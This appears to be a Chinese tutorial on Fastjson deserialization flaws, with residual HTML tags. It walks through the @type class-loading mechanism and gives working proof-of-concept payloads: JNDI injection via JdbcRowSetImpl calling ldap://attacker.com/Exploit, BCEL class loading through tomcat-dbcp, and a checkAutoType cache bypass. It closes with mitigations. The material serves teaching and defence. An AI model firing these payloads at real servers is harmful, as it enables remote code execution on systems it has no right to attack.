Fastjson反序列化漏洞深度分析与教学文档<\/h1>

1. Fastjson简介<\/h2>
Fastjson是阿里巴巴开源的一个高性能Java库，主要用于：<\/p>
将Java对象转换为JSON字符串（序列化）<\/li>
将JSON字符串转换为Java对象（反序列化）<\/li> <\/ul>
因其解析速度快、使用简单，被广泛应用于Java开发中。<\/p>
2. 漏洞原理<\/h2>
Fastjson反序列化漏洞的核心在于@type<\/code>字段的动态类加载机制：<\/p>

@type字段作用<\/strong>：指定反序列化时应该转换成的Java类<\/li>
漏洞成因<\/strong>：当攻击者能够控制@type<\/code>字段的值时，可以：

加载任意恶意类<\/li>
触发类中的危险方法<\/li>
可能导致远程代码执行(RCE)、信息泄露等安全问题<\/li>
<\/ul>
<\/li>
<\/ol>
3. 漏洞分析<\/h2>
3.1 基本执行流程<\/h3>
通过一个简单的Group类示例展示Fastjson的工作流程：<\/p>
\/\/ Group.java
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> Group<\/span> {<\/span>
<\/span><\/span>    private<\/span> Long id;<\/span>
<\/span><\/span>    private<\/span> String name;<\/span>
<\/span><\/span>    private<\/span> Map map;<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> Group<\/span>()<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"构造方法Group"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> void<\/span> setId<\/span>(<\/span>Long id)<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"setId"<\/span>);<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"open -a Calculator"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span>(<\/span>Exception e)<\/span> {}<\/span>
<\/span><\/span>        this<\/span>.<\/span>id<\/span> =<\/span> id;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 其他getter\/setter省略
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ Main.java
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> Main<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        String s =<\/span> "{\"@type\":\"org.example.Group\",\"id\":0,\"name\":\"admin\"}"<\/span>;<\/span>
<\/span><\/span>        JSONObject jsonObject =<\/span> JSON.<\/span>parseObject<\/span>(<\/span>s);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>jsonObject);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>执行流程：<\/p>

通过@type<\/code>指定目标类org.example.Group<\/code><\/li>
Fastjson实例化Group对象<\/li>
调用setter方法设置属性<\/li>
执行过程中触发恶意代码（如示例中的计算器弹出）<\/li>
<\/ol>
3.2 Fastjson <= 1.2.24漏洞利用<\/h3>
方式一：JNDI注入<\/h4>
环境要求<\/strong>：<\/p>

JDK 1.8.0_102（高版本有防护）<\/li>
Fastjson 1.2.24<\/li>
tomcat-dbcp 9.0.20<\/li>
<\/ul>
利用点<\/strong>：

com.sun.rowset.JdbcRowSetImpl<\/code>类的connect()<\/code>方法中存在JNDI lookup操作<\/p>
利用链<\/strong>：<\/p>

setAutoCommit()<\/code> → connect()<\/code><\/li>
connect()<\/code> → lookup(DataSourceName)<\/code><\/li>
<\/ol>
POC<\/strong>：<\/p>
String s =<\/span> "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",
<\/span><\/span><\/span>            \"DataSourceName\":\"ldap:\/\/attacker.com\/Exploit\",
<\/span><\/span><\/span>            \"autoCommit\":false}"<\/span>;<\/span>
<\/span><\/span>JSON.<\/span>parseObject<\/span>(<\/span>s);<\/span>
<\/span><\/span><\/code><\/pre>方式二：BCEL类加载（不出网）<\/h4>
利用点<\/strong>：

org.apache.tomcat.dbcp.dbcp2.BasicDataSource<\/code>类的createConnectionFactory<\/code>方法<\/p>
利用链<\/strong>：<\/p>

通过setDriverClassName<\/code>设置恶意BCEL编码的类<\/li>
通过setDriverClassLoader<\/code>设置类加载器<\/li>
getConnection()<\/code>触发类加载<\/li>
<\/ol>
POC<\/strong>：<\/p>
\/\/ 生成BCEL编码的恶意类
<\/span><\/span><\/span><\/span>ClassLoader classLoader =<\/span> new<\/span> ClassLoader();<\/span>
<\/span><\/span>byte<\/span>[]<\/span> bytes =<\/span> fileToByteArray(<\/span>"Test.class"<\/span>);<\/span> \/\/ 恶意类字节码
<\/span><\/span><\/span><\/span>String code =<\/span> Utility.<\/span>encode<\/span>(<\/span>bytes,<\/span> true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ Fastjson利用
<\/span><\/span><\/span><\/span>String s =<\/span> "{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",
<\/span><\/span><\/span>            \"DriverClassName\":\"
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>BCEL
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>"<\/span>+<\/span>code+<\/span>"\",
<\/span><\/span><\/span>            \"DriverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}}"<\/span>;<\/span>
<\/span><\/span>JSON.<\/span>parseObject<\/span>(<\/span>s);<\/span>
<\/span><\/span><\/code><\/pre>3.3 Fastjson <= 1.2.47漏洞利用<\/h3>
1.2.24之后的版本增加了checkAutoType<\/code>防护，但存在缓存绕过：<\/p>
绕过原理<\/strong>：<\/p>

Fastjson会缓存已加载的类<\/li>
先通过无害的java.lang.Class<\/code>加载恶意类到缓存<\/li>
再直接使用恶意类<\/li>
<\/ol>
利用步骤<\/strong>：<\/p>

使用java.lang.Class<\/code>加载目标类到缓存<\/li>
使用目标类进行攻击<\/li>
<\/ol>
POC<\/strong>：<\/p>
String s =<\/span> "{{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},
<\/span><\/span><\/span>            {\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",
<\/span><\/span><\/span>            \"datasourcename\":\"ldap:\/\/attacker.com\/Exploit\",
<\/span><\/span><\/span>            \"autocommit\":0}}"<\/span>;<\/span>
<\/span><\/span>JSON.<\/span>parseObject<\/span>(<\/span>s);<\/span>
<\/span><\/span><\/code><\/pre>4. 防护措施<\/h2>

升级Fastjson<\/strong>：使用最新版本（已修复这些漏洞）<\/li>
安全配置<\/strong>：

开启SafeMode<\/code><\/li>
配置autoTypeSupport<\/code>为false<\/li>
使用白名单机制<\/li>
<\/ul>
<\/li>
JDK防护<\/strong>：

JDK 8u113+默认禁用远程Codebase加载<\/li>
设置系统属性com.sun.jndi.rmi.object.trustURLCodebase=false<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
5. 漏洞验证与测试<\/h2>
测试时注意：<\/p>

使用正确的JDK版本（如1.8.0_102测试JNDI）<\/li>
确认Fastjson版本<\/li>
使用无害的测试命令（如弹出计算器）<\/li>
<\/ol>
6. 总结<\/h2>
Fastjson反序列化漏洞的核心在于：<\/p>

@type<\/code>字段的动态类加载<\/li>
危险方法的自动调用（setter\/getter）<\/li>
可利用的JDK内置类（JdbcRowSetImpl等）<\/li>
<\/ol>
理解这些原理有助于：<\/p>

更好地防御此类漏洞<\/li>
安全地使用JSON库<\/li>
提高代码审计能力<\/li>
<\/ul>